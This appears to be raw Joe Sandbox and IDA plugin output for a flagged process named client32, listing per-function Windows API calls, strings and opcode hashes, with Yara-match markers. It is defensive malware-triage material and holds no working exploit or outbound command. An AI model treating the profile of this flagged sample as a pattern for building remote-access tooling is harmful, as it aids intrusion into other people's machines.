                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                                                    • API String ID: 4180936305-2664294811
                                                                                                                                                                                                    • Opcode ID: 8c46f8bdfcf2cceb23277aedb1d4bd90d56bb8b7b475ab6a7bb023f0edc9b731
                                                                                                                                                                                                    • Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c46f8bdfcf2cceb23277aedb1d4bd90d56bb8b7b475ab6a7bb023f0edc9b731
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,75C1F550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                      • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                      • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,005FF708,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2256153495-0
                                                                                                                                                                                                    • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: af0741c83ff0c3ea02da9e4e70e0ae876956b4f6ade4dddd8bd1eda65f1bfe07
                                                                                                                                                                                                    • Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af0741c83ff0c3ea02da9e4e70e0ae876956b4f6ade4dddd8bd1eda65f1bfe07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                                                                                    • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                                                                    • Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                                                                                    • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DriveType
                                                                                                                                                                                                    • String ID: ?:\
                                                                                                                                                                                                    • API String ID: 338552980-2533537817
                                                                                                                                                                                                    • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAE9D
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAEEC
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                                                                                    • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAE9D
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                                                                                    • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,023AB828,?,?,?,00000100), ref: 111429F9
                                                                                                                                                                                                      • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                    • String ID: NSMTRACE
                                                                                                                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                                                                                                                    • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,689B8DC8), ref: 689B4F78
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                                                                    • Opcode ID: a8b60b9dda3a6b07c623928f8cbb1408a5b3ebfb0193506934f53bec7e4690f6
                                                                                                                                                                                                    • Instruction ID: 249629ea64837930bfbe638d506f8bc16114fdc333406fdcca73a37522f94532
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8b60b9dda3a6b07c623928f8cbb1408a5b3ebfb0193506934f53bec7e4690f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E001B1901B108F83B4CF3AA90464ABEF4BB086503118A3E909EC3B00E330E585CF80
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                                                                    • Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                                                                                    • Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: nslsp.dll
                                                                                                                                                                                                    • API String ID: 1029625771-3933918195
                                                                                                                                                                                                    • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                                                                                    • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32(976034B3,4004667F,00000000,-000397EB), ref: 689B5D1F
                                                                                                                                                                                                    • select.WSOCK32(00000001,?,00000000,?,00000000,976034B3,4004667F,00000000,-000397EB), ref: 689B5D62
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ioctlsocketselect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1457273030-0
                                                                                                                                                                                                    • Opcode ID: 1dc3fda9468080709a2a4820a70703daf98d8ce9695cb763ec8df7d6e1b26714
                                                                                                                                                                                                    • Instruction ID: 19e43d8aa1aee1c594a980052fb302144efa642799692b476022550cbf0196e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc3fda9468080709a2a4820a70703daf98d8ce9695cb763ec8df7d6e1b26714
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0211071A002189BEB28CF54D9547EDB7B9EF88304F40C1DAA80DAB281DB759F94DF94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesCreateDirectoryErrorFileFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3986419549-0
                                                                                                                                                                                                    • Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                                                                                                    • Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • getsockname.WSOCK32(?,?,00000010,?,02ED2CB8,?), ref: 689B9005
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,00000010,?,02ED2CB8,?), ref: 689B902E
                                                                                                                                                                                                      • Part of subcall function 689B5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,689B8F91,00000000,00000000,689FB8DA,?,00000080), ref: 689B5852
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastgetsocknameinet_ntoa
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1341105688-0
                                                                                                                                                                                                    • Opcode ID: 3b1a5487fa660b6182d6f4743c12caf4961ba2c0efb02cc558f49d85244cc56b
                                                                                                                                                                                                    • Instruction ID: c99dab422e6432043ca9801d288c24ef7fb009ed7c551797d18d7f7f2553f1c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b1a5487fa660b6182d6f4743c12caf4961ba2c0efb02cc558f49d85244cc56b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C112E76E00118AFCB00DFA9DD01ABFB7B8EB99214F40856AEC05E7240E775AA14CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryInformationSystemVolume
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2949477388-0
                                                                                                                                                                                                    • Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                                                                                    • Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(110889B6,00000000,?,11163AC3,110889B6,?,?,110B6870,110889B6,?,?,110B688E,110889B6,00000000), ref: 11163A67
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11163AC3,110889B6,?,?,110B6870,110889B6,?,?,110B688E,110889B6,00000000), ref: 11163A72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1799206407-0
                                                                                                                                                                                                    • Opcode ID: a35662674006e9dbed1c8c3a39dda94a83e62942c9cd4bd8e1fab7f0096d224e
                                                                                                                                                                                                    • Instruction ID: 244d9ff634253c78f44cee2031fdec3830f364ea7d9b5f9f0ec072f6a69f13a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a35662674006e9dbed1c8c3a39dda94a83e62942c9cd4bd8e1fab7f0096d224e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE01D6358183195BD7036FB4894468DFB5C9F0177CF124505E929CA190DBF79871EB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
                                                                                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000104BD,000104BF,00000001), ref: 11140B08
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExtractFileIconModuleName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3911389742-0
                                                                                                                                                                                                    • Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                                                                                    • Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WSACancelBlockingCall.WSOCK32 ref: 689B63A9
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 689B63B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BlockingCallCancelSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3706969569-0
                                                                                                                                                                                                    • Opcode ID: 46a263bf7bd1fcd2b83584406b6aad924a2fbdf020c1697b5b2762a22bda89cc
                                                                                                                                                                                                    • Instruction ID: 715bd5981cc90a6ad4fa9af363682152a500dae9a72e1898436e3e0cac526bd3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46a263bf7bd1fcd2b83584406b6aad924a2fbdf020c1697b5b2762a22bda89cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08B0127839111049EF0213714E0633F30CC1FE524BFD844A0BB52C8085FF30E100E021
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000109,?,11175A83,00000109), ref: 1116D78A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11175A83,00000109), ref: 1116D794
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                    • Opcode ID: a53ce75d855dcbd486073db0eb06d7dfc2c285a5fb8413f02e9700c2a28670b3
                                                                                                                                                                                                    • Instruction ID: d8059401cb665801cb5abb2c0c8a905e6926a2865a99ab4fc771fff1d96c2e64
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a53ce75d855dcbd486073db0eb06d7dfc2c285a5fb8413f02e9700c2a28670b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7018E37615AF11AD60215B86A45B4EFB5C4F8173CF690165E8A4CB2C0EEEBD8D0C253
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,023AB828,000000FF,?), ref: 11141545
                                                                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023AB828,000000FF,?), ref: 11141555
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
